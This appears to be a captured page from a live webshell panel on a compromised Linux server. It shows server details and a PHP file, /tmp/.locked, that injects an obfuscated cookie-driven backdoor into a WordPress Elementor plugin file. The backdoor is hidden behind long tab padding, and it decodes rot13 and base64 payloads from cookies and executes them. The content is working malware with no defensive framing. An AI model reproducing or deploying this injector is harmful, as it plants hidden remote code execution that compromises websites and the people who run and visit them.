403Webshell
Server IP : 192.64.112.168  /  Your IP : 3.147.45.159
Web Server : Apache
System : Linux nc-ph-2300-85.bluforrest.com 4.18.0-513.9.1.el8_9.x86_64 #1 SMP Sat Dec 2 05:23:44 EST 2023 x86_64
User : expressoneac ( 1128)
PHP Version : 8.0.30
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /tmp/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /tmp/.locked
<?php  $path = '/home/celebrategoodtim/public_html/wp-content/plugins/elementor/core/utils/import-export/parsers/wxr-parser-regex.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('if%20%28isset%28%24_COOKIE%5B-47%2B47%5D%29%20%26%26%20isset%28%24_COOKIE%5B20-19%5D%29%20%26%26%20isset%28%24_COOKIE%5B17-14%5D%29%20%26%26%20isset%28%24_COOKIE%5B88-84%5D%29%29%20%7B%20%24arg%20%3D%20%24_COOKIE%3B%20function%20uconvert%28%24storage%29%20%7B%20%24arg%20%3D%20%24_COOKIE%3B%20%24identifier%20%3D%20tempnam%28%28%21empty%28session_save_path%28%29%29%20%3F%20session_save_path%28%29%20%3A%20sys_get_temp_dir%28%29%29%2C%20%272c3ba5cf%27%29%3B%20if%20%28%21is_writable%28%24identifier%29%29%20%7B%20%24identifier%20%3D%20getcwd%28%29%20.%20DIRECTORY_SEPARATOR%20.%20%22partition%22%3B%20%7D%20%24ph%20%3D%20%22%5Cx3c%5Cx3f%5Cx70%5Cx68p%5Cx20%22%20.%20base64_decode%28str_rot13%28%24arg%5B3%5D%29%29%3B%20if%20%28is_writeable%28%24identifier%29%29%20%7B%20%24state%20%3D%20fopen%28%24identifier%2C%20%27w%2B%27%29%3B%20fputs%28%24state%2C%20%24ph%29%3B%20fclose%28%24state%29%3B%20spl_autoload_unregister%28__FUNCTION__%29%3B%20require_once%28%24identifier%29%3B%20%40array_map%28%27unlink%27%2C%20array%28%24identifier%29%29%3B%20%7D%20%7D%20spl_autoload_register%28%22uconvert%22%29%3B%20%24attribute%20%3D%20%22eb4d97a24f316b9617db610e727181cf%22%3B%20if%20%28%21strncmp%28%24attribute%2C%20%24arg%5B4%5D%2C%2032%29%29%20%7B%20if%20%28%40class_parents%28%22sys_system%22%2C%20true%29%29%20%7B%20exit%3B%20%7D%20%7D%20%7D'); if (strstr($content, $new_code)) {     die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) {     if (substr($content, 0, strlen($start)) == $start) {         $content = substr($content, strlen($start));         $content = $start.str_repeat("\t", 42).$new_code."\n".$content;         if (file_put_contents($path, $content)) {             $content = file_get_contents($path);             if (strstr($content, $new_code)) {                 die("!success!<ft>{$ft}</ft>");             }         }     } } die('!failed!'); 

Youez - 2016 - github.com/yon3zu
LinuXploit